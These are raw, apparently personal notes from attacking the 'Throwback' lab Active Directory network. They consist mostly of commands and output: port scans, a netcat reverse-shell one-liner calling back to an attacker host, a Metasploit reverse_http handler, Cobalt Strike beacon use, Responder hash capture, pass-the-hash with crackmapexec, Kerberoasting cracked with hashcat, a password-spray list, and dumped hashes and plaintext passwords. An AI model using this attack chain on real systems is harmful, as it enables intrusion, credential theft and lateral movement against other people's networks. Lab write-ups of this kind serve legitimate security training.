nmap -sV -sC -p- -v 10.200.34.0/24 --min-rate 5000

[email protected]Evilshad0w  ~  sudo nmap -p- -sC -sS -sV -T4 -Pn 10.200.34.219Password:Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 15:44 CSTNmap scan report for 10.200.34.219Host is up (0.23s latency).Not shown: 65524 filtered tcp ports (no-response)PORT      STATE SERVICE       VERSION22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)| ssh-hostkey: |   2048 85:b8:1f:80:46:3d:91:0f:8c:f2:f2:3f:5c:87:67:72 (RSA)|   256 5c:0d:46:e9:42:d4:4d:a0:36:d6:19:e5:f3:ce:49:06 (ECDSA)|_  256 e2:2a:cb:39:85:0f:73:06:a9:23:9d:bf:be:f7:50:0c (ED25519)80/tcp    open  http          Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: Throwback Hacks135/tcp   open  msrpc         Microsoft Windows RPC139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn445/tcp   open  tcpwrapped3389/tcp  open  ms-wbt-server Microsoft Terminal Services| rdp-ntlm-info: |   Target_Name: THROWBACK|   NetBIOS_Domain_Name: THROWBACK|   NetBIOS_Computer_Name: THROWBACK-PROD|   DNS_Domain_Name: THROWBACK.local|   DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local|   DNS_Tree_Name: THROWBACK.local|   Product_Version: 10.0.17763|_  System_Time: 2022-06-20T07:52:46+00:00| ssl-cert: Subject: commonName=THROWBACK-PROD.THROWBACK.local| Not valid before: 2022-06-09T18:26:41|_Not valid after:  2022-12-09T18:26:41|_ssl-date: 2022-06-20T07:53:29+00:00; 0s from scanner time.5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Service Unavailable|_http-server-header: Microsoft-HTTPAPI/2.05985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.049667/tcp open  msrpc         Microsoft Windows RPC49669/tcp open  msrpc         Microsoft Windows RPC49679/tcp open  msrpc         Microsoft Windows RPCService Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:| smb2-security-mode: |   3.1.1: |_    Message signing enabled but not required| smb2-time: |   date: 2022-06-20T07:52:52|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 564.81 seconds

[email protected]Evilshad0w  ~  sudo nmap -p- -sC -sS -sV -T4 -Pn 10.200.34.138Password:Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 16:01 CSTNmap scan report for 10.200.34.138Host is up (0.23s latency).Not shown: 65531 filtered tcp ports (no-response)PORT    STATE SERVICE  VERSION22/tcp  open  ssh      OpenSSH 7.5 (protocol 2.0)| ssh-hostkey: |_  4096 38:04:a0:a1:d0:e6:ab:d9:7d:c0:da:f3:66:bf:77:15 (RSA)53/tcp  open  domain   (generic dns response: REFUSED)80/tcp  open  http     nginx|_http-title: Did not follow redirect to https://10.200.34.138/443/tcp open  ssl/http nginx|_http-title: pfSense - Login| ssl-cert: Subject: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate| Subject Alternative Name: DNS:pfSense-5f099cf870c18| Not valid before: 2020-07-11T11:05:28|_Not valid after:  2021-08-13T11:05:281 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port53-TCP:V=7.92%I=7%D=6/20%Time=62B02ABA%P=x86_64-apple-darwin21.1.0%SF:r(DNSVersionBindReqTCP,E,"\0\x0c\0\x06\x81\x05\0\0\0\0\0\0\0\0");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 514.95 seconds THROWBACK-MAIL[email protected]Evilshad0w  ~  sudo nmap -p- -sC -sS -sV -T4 -Pn 10.200.34.232Password:Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 15:56 CSTNmap scan report for 10.200.34.232Host is up (0.24s latency).Not shown: 65531 closed tcp ports (reset)PORT    STATE SERVICE  VERSION22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 7e:de:bb:07:2d:61:6e:0a:a5:7a:f4:39:4b:67:71:ea (RSA)|   256 80:02:7e:d5:10:81:3e:3b:6a:28:c7:0f:36:91:16:62 (ECDSA)|_  256 f7:fb:92:85:ad:d0:d2:5d:13:02:48:6a:45:00:c3:cb (ED25519)80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))| http-title: Throwback Hacks - Login|_Requested resource was src/login.php|_http-server-header: Apache/2.4.29 (Ubuntu)143/tcp open  imap     Dovecot imapd (Ubuntu)| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal| Not valid before: 2020-07-25T15:51:57|_Not valid after:  2030-07-23T15:51:57|_ssl-date: TLS randomness does not represent time|_imap-capabilities: more LOGIN-REFERRALS OK have post-login Pre-login listed LITERAL+ SASL-IR LOGINDISABLEDA0001 STARTTLS capabilities ENABLE IDLE IMAP4rev1 ID993/tcp open  ssl/imap Dovecot imapd (Ubuntu)| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal| Not valid before: 2020-07-25T15:51:57|_Not valid after:  2030-07-23T15:51:57|_ssl-date: TLS randomness does not represent time|_imap-capabilities: more LOGIN-REFERRALS OK have Pre-login post-login LITERAL+ SASL-IR listed AUTH=PLAINA0001 capabilities ENABLE IDLE IMAP4rev1 IDService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1683.78 seconds

Summers Winters CEO & FounderJeff Davies     CFOHugh Gongo      CTORikka Foxx      Lead Developer

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.50.31.71 2233 >/tmp/f

root:*LOCKED*$2y$10$q81moODbYy1KXoLJxIoc1uXlpBKeSCiieaKiNxjPqTLmNZY3n/Fga:0:0::0:0:Charlie &:/root:/bin/shtoor:*:0:0::0:0:Bourne-again Superuser:/root:daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologinoperator:*:2:5::0:0:System &:/:/usr/sbin/nologinbin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologintty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologinkmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologingames:*:7:13::0:0:Games pseudo-user:/:/usr/sbin/nologinnews:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologinman:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologinsshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologinsmmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologinmailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologinbind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologinunbound:*:59:59::0:0:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologinproxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologinuucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucicopop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologinauditdistd:*:78:77::0:0:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologinwww:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin_ypldap:*:160:160::0:0:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologinhast:*:845:845::0:0:HAST unprivileged user:/var/empty:/usr/sbin/nologinnobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin_relayd:*:913:913::0:0:Relay Daemon:/var/empty:/usr/sbin/nologindhcpd:*:136:136::0:0:ISC DHCP daemon:/nonexistent:/usr/sbin/nologinadmin:$2y$10$q81moODbYy1KXoLJxIoc1uXlpBKeSCiieaKiNxjPqTLmNZY3n/Fga:0:0::0:0:System Administrator:/root:/etc/rc.initialec2-user:$2$10$zae.EdVMDyWWVJGAQEOtdO7fTAp.6BWOeFnSYf7qV45rjsnKg0DEC:2000:65534::0:0:EC2 User:/home/ec2-user:/bin/tcsh

cat /root/root.txtTBH{b6xxxxxxxxxxxx749}

# cat /var/log/flag.txtTBH{c9xxxxxxxxx4484}

# cat /var/log/login.logLast Login 8/9/2020 15:51 -- HumphreyW:1c13639dba96c7b53d26f7d00956a364  解密为（securitycenter）

Summer2020Management2020Management2018Password2020<company>2020 这里的意思是根据公司名称自定义Password123

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::BlaireJ:1001:aad3b435b51404eeaad3b435b51404ee:c374ecb7c2ccac1df3a82bce4f80bb5b:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::sshd:1002:aad3b435b51404eeaad3b435b51404ee:50527b4bfe81a64edf00e6b05c26c195:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:0a06b1381599f2c8c8bfdbee39edbe1c:::

beacon> shell arp -a[*] Tasked beacon to run: arp -a[+] host called home, sent: 37 bytes[+] received output:
Interface: 10.200.34.222 --- 0x3  Internet Address      Physical Address      Type  10.200.34.1           02-b3-3b-92-e6-9b     dynamic     10.200.34.117         02-00-30-dc-78-4d     dynamic     10.200.34.219         02-b2-be-02-a1-4d     dynamic     10.200.34.232         02-06-ee-e4-a7-f7     dynamic     10.200.34.255         ff-ff-ff-ff-ff-ff     static      169.254.169.254       02-b3-3b-92-e6-9b     dynamic     224.0.0.22            01-00-5e-00-00-16     static      224.0.0.251           01-00-5e-00-00-fb     static      224.0.0.252           01-00-5e-00-00-fc     static      239.255.255.250       01-00-5e-7f-ff-fa     static      255.255.255.255       ff-ff-ff-ff-ff-ff     static THROWBACK-PROD

sudo responder -I tun0 -v

[SMB] NTLMv2-SSP Client   : 10.200.34.219[SMB] NTLMv2-SSP Username : THROWBACK\PetersJ[SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:253bcb8412a13048:23AE2B14DA34122CF64139274B9A0CDF:0101000000000000C0653150DE09D2012B4CFCA96E37E129000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000000000000020000039B59080B8031B8B8CEB50610689DAABB665891F5D1740D7C7CF5B3B00753C6F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00350030002E00330031002E00370031000000000000000000[SMB] NTLMv2-SSP Client   : 10.200.34.219[SMB] NTLMv2-SSP Username : THROWBACK\PetersJ[SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:e8720d62b334d299:ADCCA8CCF0C3C3F04A37E318E43F8E68:0101000000000000C0653150DE09D201DC5BAB792677D2DD000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000000000000020000039B59080B8031B8B8CEB50610689DAABB665891F5D1740D7C7CF5B3B00753C6F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00350030002E00330031002E00370031000000000000000000

PETERSJ::THROWBACK:253bcb8412a13048:23ae2b14da34122cf64139274b9a0cdf:0101000000000000c0653150de09d2012b4cfca96e37e129000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d2010600040002000000080030003000000000000000000000000020000039b59080b8031b8b8ceb50610689daabb665891f5d1740d7c7cf5b3b00753c6f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00350030002e00330031002e00370031000000000000000000:Throwback317

throwback\[email protected] C:\Users\petersj>PowerShell.exe -ExecutionPolicy Bypass                                                       Windows PowerShell                                                                                                                             Copyright (C) Microsoft Corporation. All rights reserved.                                                                                                                                                                                                                                     PS C:\Users\petersj> 
PS C:\temp> wget http://10.50.31.71:8080/Ghostpack-CompiledBinaries/Seatbelt.exe -o 2.exe

./2.exe CredEnum

runas /savecred /user:admin-petersj /profile "cmd.exe"

dir /s user.txtdir /s root.txt

[+] received password hashes:admin-petersj:1010:aad3b435b51404eeaad3b435b51404ee:74fb0a2ee8a066b1e372475dcbc121c5:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:a06e58d15a2585235d18598788b8147a:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::sshd:1009:aad3b435b51404eeaad3b435b51404ee:fe2acb5ea93988befc849a6981e0526a:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::

..........* Username : BlaireJ* Domain   : THROWBACK* Password : (null)  kerberos :           * Username : BlaireJ* Domain   : THROWBACK.LOCAL* Password : 7eQgx6YzxgG3vC45t5k9...........* Username : admin-petersj* Domain   : Login* Password : SinonFTW123!            [00000002]* Username : THROWBACK-PROD\admin-petersj* Domain   : THROWBACK-PROD\admin-petersj* Password : SinonFTW123!............

load OnlineIP10.200.34.0/24 is Valid CIDRIPCound: 256Scan Start: 2022-06-20 22:39:23
[+] received output:10.200.34.110.200.34.7910.200.34.11710.200.34.1310.200.34.11810.200.34.17610.200.34.21910.200.34.22210.200.34.232=============================================OnlinePC:9Cidr Scan Finished!End: 2022-06-20 22:40:41

[*] Ladon 10.200.34.0/24 PortScan[+] host called home, sent: 407641 bytes[+] received output:Ladon 9.1.4 for Cobalt StrikeStart: 2022-06-20 22:43:12PC Name: THROWBACK-WS01 Lang: en-USRuntime: .net 4.0  ME: x64 OS: x64
[+] received output:OS Name: Microsoft Windows 10 Pro
[+] received output:Machine Make: XenRunUser: BlaireJ PR: *IsAdminPriv: SeImpersonatePrivilegeEnabledPID: 1028  CurrentProcess: rundll32FreeSpace: Disk C:\ 33785 MB
load PortScan10.200.34.0/24 is Valid CIDRIPCound: 256Scan Start: 2022-06-20 22:43:14
[+] received output:PCname: 10.200.34.117 THROWBACK-DC0110.200.34.117 139 Open -> Banner: Windows Netbios10.200.34.117 389 Open -> Default is LDAP 10.200.34.117 445 Open -> Default is SMB 10.200.34.117 636 Open 10.200.34.117 5985 Open -> Banner: Win Winrm10.200.34.117 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.710.200.34.117 88 Open -> Default is Kerberos WebTitle: http://10.200.34.117:80 -> IIS Windows ServerWebBanner: http://10.200.34.117:80 -> Microsoft-IIS/10.010.200.34.117 80 Open -> Banner: HTTP/1.1 400 Bad Request Content-Length: 334 Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 21 Jun 2022 05:43:38 GMT Connection: close10.200.34.117 135 Open -> Default is WMI 10.200.34.117 3389 Open -> Default is RDP 
[+] received output:10.200.34.138 22 Open -> Banner: SSH-2.0-OpenSSH_7.510.200.34.138 443 Open -> Banner: HTTP/1.1 400 Bad Request Server: nginx Date: Tue, 21 Jun 2022 05:43:43 GMT Content-Type: text/html Content-Length: 150 Connection: close10.200.34.138 80 Open -> Banner: HTTP/1.1 400 Bad Request Server: nginx Date: Tue, 21 Jun 2022 05:43:43 GMT Content-Type: text/html Content-Length: 150 Connection: closePCname: 10.200.34.222 THROWBACK-WS01.THROWBACK.local10.200.34.222 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.710.200.34.222 445 Open -> Default is SMB 10.200.34.222 139 Open -> Banner: Windows Netbios10.200.34.222 5985 Open -> Banner: Win Winrm
[+] received output:10.200.34.222 135 Open -> Default is WMI 10.200.34.222 3389 Open -> Default is RDP 
[+] received output:PCname: 10.200.34.176 THROWBACK-TIMEPCname: 10.200.34.219 THROWBACK-PROD10.200.34.219 445 Open -> Default is SMB 10.200.34.176 445 Open -> Default is SMB 10.200.34.176 139 Open -> Banner: Windows Netbios10.200.34.219 139 Open -> Banner: Windows Netbios10.200.34.219 5357 Open -> Banner: Win7 Microsoft-HTTPAPI10.200.34.219 5985 Open -> Banner: Win Winrm10.200.34.176 5985 Open -> Banner: Win Winrm10.200.34.219 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.7WebTitle: http://10.200.34.219:80 -> Throwback HacksWebBanner: http://10.200.34.219:80 -> Microsoft-IIS/10.010.200.34.219 80 Open -> Banner: HTTP/1.1 400 Bad Request Content-Length: 334 Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 21 Jun 2022 05:43:53 GMT Connection: close10.200.34.176 22 Open -> Banner: SSH-2.0-OpenSSH_for_Windows_7.710.200.34.176 443 Open -> Banner: HTTP/1.1 400 Bad Request Date: Tue, 21 Jun 2022 05:43:53 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.31 Vary: accept-language,accept-charset Accept-Ranges: bytes Connection: close CWebTitle: http://10.200.34.176:80 -> Throwback Hacks TimekeepWebBanner: http://10.200.34.176:80 -> Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.3110.200.34.176 80 Open -> Banner: HTTP/1.1 400 Bad Request Date: Tue, 21 Jun 2022 05:43:53 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.31 Vary: accept-language,accept-charset Accept-Ranges: bytes Connection: close C
[+] received output:10.200.34.176 135 Open -> Default is WMI 10.200.34.219 135 Open -> Default is WMI 10.200.34.176 3306 Open -> Default is Mysql 10.200.34.176 3389 Open -> Default is RDP 10.200.34.219 3389 Open -> Default is RDP 
[+] received output:10.200.34.232 22 Open -> Banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.310.200.34.232 143 Open -> Default is IMAP -> Banner: * OK Waiting for authentication process to respond.. -> Hex: (2A204F4B2057616974696E6720666F722061757468656E7469636174696F6E2070726F6365737320746F20726573706F6E642E2E0D0A)=============================================OnlinePC:7Cidr Scan Finished!End: 2022-06-20 22:43:5710.200.34.232 993 Open -> Default is IMAPS WebTitle: http://10.200.34.232:80 -> Throwback Hacks - LoginWebBanner: http://10.200.34.232:80 -> Apache/2.4.29 (Ubuntu)10.200.34.232 80 Open -> Banner: HTTP/1.1 400 Bad Request Date: Tue, 21 Jun 2022 05:43:58 GMT Server: Apache/2.4.29 (Ubuntu) Connection: close Content-Type: text/html; charset=iso-8859-1

export  all_proxy=socks4://127.0.0.1:3306

Administrator:500:aad3b435b51404eeaad3b435b51404ee:43d73c6a52e8626eabc5eb77148dca0b:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::sshd:1008:aad3b435b51404eeaad3b435b51404ee:6eea75cd2cc4ddf2967d5ee05792f9fb:::Timekeeper:1009:aad3b435b51404eeaad3b435b51404ee:901682b1433fdf0b04ef42b13e343486:::  keeperoftimeWDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::

use exploit/multi/handlerset payload windows/meterpreter/reverse_httpset lhost 10.50.31.71set lport 7788run

define('DB_SRV', 'localhost');define('DB_PASSWD', "SuperSecretPassword!");define('DB_USER', 'TBH');define('DB_NAME', 'timekeepusers');
$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);
if($connection == false){
           die("Error: Connection to Database could not be made." . mysqli_connect_error());}?>

proxychains4 cme smb 10.200.34.0/24 -d THROWBACK -u ~/Downloads/user.txt -p ~/Downloads/pass.txt 2>1 | grep \+

proxychains crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>proxychains4 cme smb 10.200.34.0/24 -u BlaireJ -d THROWBACK -H c374ecb7c2ccac1df3a82bce4f80bb5b 2>1 | grep "SMB"proxychains4 cme smb 10.200.34.0/24 -u HumphreyW -d THROWBACK -H 1c13639dba96c7b53d26f7d00956a364 2>1 | grep "SMB"

[email protected]  ~/Downloads  proxychains4 ssh "blairej"@10.200.34.222 [proxychains] config file found: /usr/local/etc/proxychains.conf[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.16/lib/libproxychains4.dylib[proxychains] DLL init: proxychains-ng 4.16[proxychains] Strict chain  ...  10.50.31.74:996  ...  10.200.34.222:22  ...  OKThe authenticity of host '10.200.34.222 (10.200.34.222)' can't be established.ED25519 key fingerprint is SHA256:eZtAKLuTEhhz2sLQeUaf9bA+S9fMhVljqdlRdIsk9Hw.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.200.34.222' (ED25519) to the list of known hosts.[email protected]'s password: Microsoft Windows [Version 10.0.19041.388](c) 2020 Microsoft Corporation. All rights reserved.                                                    PS C:\Users\BlaireJ> Import-Module .\SharpHound.ps1PS C:\Users\BlaireJ> Invoke-Bloodhound -CollectionMethod All -Domain Throwback -ZipFileName loot.zip-----------------------------------------------Initializing SharpHound at 1:02 AM on 6/22/2022-----------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain THROWBACK.LOCAL using path CN=Schema,CN=Configuration,DC=THROWBACK,DC=LOCALPS C:\Users\BlaireJ> [+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDSStatus: 0 objects finished (+0) -- Using 77 MB RAMStatus: 151 objects finished (+151 37.75)/s -- Using 88 MB RAMEnumeration finished in 00:00:04.8533233Compressing data to C:\Users\BlaireJ\20220622010214_loot.zipYou can upload this file directly to the UI
SharpHound Enumeration Completed at 1:02 AM on 6/22/2022! Happy Graphing!

[email protected]  ~/Downloads  proxychains4 GetUserSPNs.py -dc-ip 10.200.34.117 THROWBACK.local/blairej:7eQgx6YzxgG3vC45t5k9 -request [proxychains] config file found: /usr/local/etc/proxychains.conf[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.16/lib/libproxychains4.dylib[proxychains] DLL init: proxychains-ng 4.16[proxychains] DLL init: proxychains-ng 4.16Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain  ...  10.50.31.74:996  ...  10.200.34.117:389  ...  OKServicePrincipalName                         Name        MemberOf  PasswordLastSet             LastLogon                   Delegation -------------------------------------------  ----------  --------  --------------------------  --------------------------  ----------TB-ADMIN-DC/SQLService.THROWBACK.local:6792  SQLService            2020-07-27 23:20:08.552650  2020-07-27 23:26:43.628665             
[-] CCache file is not found. Skipping...[proxychains] Strict chain  ...  10.50.31.74:996  ...  10.200.34.117:88  ...  OK[proxychains] Strict chain  ...  10.50.31.74:996  ...  10.200.34.117:88  ...  OK[proxychains] Strict chain  ...  10.50.31.74:996  ...  10.200.34.117:88  ...  OK$krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$77e0317a5d961420b1b891151aa0c781$74f5aabe443307b8fc7fb4d8859830214e7cd954cb51dd6e53c0b5c93dc7c4d120f354f657d95ed644745083b4011c29a8be2dc3dc45ac6bcd3e438270665fceebe4004afb096217690c244423cbb3deeab57c6da724068db483b7137902f6f0d36ffc3547910c574014c9f8008e14b2ef3561530d71a5005f8a65bedcacedba5dff02b5499dec6e0179ebe96f5c1399ec49b3ed0d92936804900725d0cfdff46f7140bb43884cf20c2c70d2ae00c474699c4d4c8e72982ef2deb9e855650472ba713b4ef0ef7ba2f6bd3802826d5dd75bf4af560629594ee807a0d49cb16b12b43364773d6dcd9437163b0bfb77dac1ed8848aa0d1fc4bd710069f9c46812542acb01bc6a0a5a71eb0dc1af16181fcd5ce559d1e540a33d4ad5936c3217b3a4e08f93c7eb8823ce76d2f9e578a3d56a2926f03689d3ffb562c91889605c781a51aa12b15d707d959aa10f5e4371a054b8dd4c2d2e91ca545ef9e15876b227fef0bc4473fbfa0fa7b0e87662e987edffefd6da3708438f108dfde61b08e715400687b673ac1ab6ebaf49c877e72f66b2387e5cebbfb70a7b3c22356bed6ff11b741be5bef82bddd80a61b6cab93c9f20ed7b8dfaa53aa80fe63314b4f94c78150b2d86b85e6c088988152bea69b0b11297dfc0300e459a428b7ae501ca4d0d36ec8ce855ad366802994c43d9da8fbb134065c104b0a9bb456f5acc200882e851c6e8e630bf622fcdf541f9cdc5f38b18b3d1be6cc4744f39bfbc6c66ca44a22d850b7c2186fdd629dd9c67d6af7837d87ea5f751548b68e47b13145cec902369054971db14731efc00d34bb16b7523c3084e72f03d20db79492acb030c566f32cd5299bb19d3475db74c33603b76009f4d8873cf290c67460f638c69767d6518d3fa1653a6c6365e53632dbec371647e35bc741cc95beafa776e4cb99dcb695ecfc74e963aa27ffd4564dbf431387ccc3f118757354c51e65ee4d0091728417cd8a6c836971d4bae5ccc9185377f96aa8e4de6a0a0fcb49a1f020fdd1a7298c8668a2c157bc235c9881d61a1f94b294428eca22c0f5e95a26fdfc7e94ae75a6cc8f6a3c8d1be125e20588067664a9931b844cde9bbd3fbbf03afecee0635f31dce4b2c81135ef0f3d51364f7daf0e9968335f26e5847de0e4b2a3c60b80d33920af4ee9d55ba3aa672d3f2fa510b63724c40d66d5a434194e7c8cff51399e37270bcbe29a4aaf904902e3f396cfff5bc4ddc7b92bddfb6bdd22dfdf49a845a030f4c46eabe4398246faf934416a8262aa9aab2dd82f567ec9190a561332e4adcd00f7eec64e1e6f93105eded1470cacc763d7aa74751c93d22217daf159bc95f178f88efc0b3bd6aeccca9f19d6c24

hashcat -m 13100 -a 0 sqlhash.txt ~/pentest/wordlists/rockyou.txthashcat sqlhash.txt --show

$krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$77e0317a5d961420b1b891151aa0c781$74f5aabe443307b8fc7fb4d8859830214e7cd954cb51dd6e53c0b5c93dc7c4d120f354f657d95ed644745083b4011c29a8be2dc3dc45ac6bcd3e438270665fceebe4004afb096217690c244423cbb3deeab57c6da724068db483b7137902f6f0d36ffc3547910c574014c9f8008e14b2ef3561530d71a5005f8a65bedcacedba5dff02b5499dec6e0179ebe96f5c1399ec49b3ed0d92936804900725d0cfdff46f7140bb43884cf20c2c70d2ae00c474699c4d4c8e72982ef2deb9e855650472ba713b4ef0ef7ba2f6bd3802826d5dd75bf4af560629594ee807a0d49cb16b12b43364773d6dcd9437163b0bfb77dac1ed8848aa0d1fc4bd710069f9c46812542acb01bc6a0a5a71eb0dc1af16181fcd5ce559d1e540a33d4ad5936c3217b3a4e08f93c7eb8823ce76d2f9e578a3d56a2926f03689d3ffb562c91889605c781a51aa12b15d707d959aa10f5e4371a054b8dd4c2d2e91ca545ef9e15876b227fef0bc4473fbfa0fa7b0e87662e987edffefd6da3708438f108dfde61b08e715400687b673ac1ab6ebaf49c877e72f66b2387e5cebbfb70a7b3c22356bed6ff11b741be5bef82bddd80a61b6cab93c9f20ed7b8dfaa53aa80fe63314b4f94c78150b2d86b85e6c088988152bea69b0b11297dfc0300e459a428b7ae501ca4d0d36ec8ce855ad366802994c43d9da8fbb134065c104b0a9bb456f5acc200882e851c6e8e630bf622fcdf541f9cdc5f38b18b3d1be6cc4744f39bfbc6c66ca44a22d850b7c2186fdd629dd9c67d6af7837d87ea5f751548b68e47b13145cec902369054971db14731efc00d34bb16b7523c3084e72f03d20db79492acb030c566f32cd5299bb19d3475db74c33603b76009f4d8873cf290c67460f638c69767d6518d3fa1653a6c6365e53632dbec371647e35bc741cc95beafa776e4cb99dcb695ecfc74e963aa27ffd4564dbf431387ccc3f118757354c51e65ee4d0091728417cd8a6c836971d4bae5ccc9185377f96aa8e4de6a0a0fcb49a1f020fdd1a7298c8668a2c157bc235c9881d61a1f94b294428eca22c0f5e95a26fdfc7e94ae75a6cc8f6a3c8d1be125e20588067664a9931b844cde9bbd3fbbf03afecee0635f31dce4b2c81135ef0f3d51364f7daf0e9968335f26e5847de0e4b2a3c60b80d33920af4ee9d55ba3aa672d3f2fa510b63724c40d66d5a434194e7c8cff51399e37270bcbe29a4aaf904902e3f396cfff5bc4ddc7b92bddfb6bdd22dfdf49a845a030f4c46eabe4398246faf934416a8262aa9aab2dd82f567ec9190a561332e4adcd00f7eec64e1e6f93105eded1470cacc763d7aa74751c93d22217daf159bc95f178f88efc0b3bd6aeccca9f19d6c24:mysql337570

proxychains4 ./PortBruteMac.......Scan complete. 3 vulnerabilities found! [+] 10.200.34.117 445 JeffersD Throwback2020 [+] 10.200.34.117 445 HumphreyW securitycenter [+] 10.200.34.117 445 DaviesJ Management2018 Run Time is : 1m10.393404951s

